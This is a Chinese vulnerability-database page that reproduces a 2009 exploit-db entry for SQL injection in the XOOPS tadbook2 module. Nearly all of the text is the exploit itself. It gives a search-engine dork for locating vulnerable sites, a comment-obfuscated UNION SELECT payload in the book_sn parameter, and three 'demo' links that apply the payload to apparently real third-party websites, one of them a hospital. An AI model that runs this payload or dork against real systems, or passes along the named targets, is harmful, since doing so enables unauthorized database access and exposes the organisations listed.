XOOPS Module tadbook2 - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057259 漏洞类型
发布时间 2009-01-11 更新时间 2009-01-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7725
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##########################################
#
# XOOPS Module:  tadbook2
#
#
##########################################
#
##AUTHOR : Stylextra
#
####HOME : http://www.zamet.org
#
####MAIL : Slawi-team@hotmail.fr
#
###########################################
#
# DORKS : dork: /modules/tadbook2/open_book.php?book_sn=
###########################################
 
target: scriptpage.com/modules/tadbook2/open_book.php?book_sn=[sql Code]
 
Sql code: -99/**/union/**/select/**/version(),2/*
 
live link: http://xxx.com/modules/tadbook2/open_book.php?book_sn=-99/**/union/**/select/**/version(),2/*
 
demo1 : http://pr.hosp.ncku.edu.tw/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/select/**/version(),2/*
 
demo2 : http://www.off.tw/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/*
 
demo3 : http://www.taot.org.tw/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/*

# milw0rm.com [2009-01-11]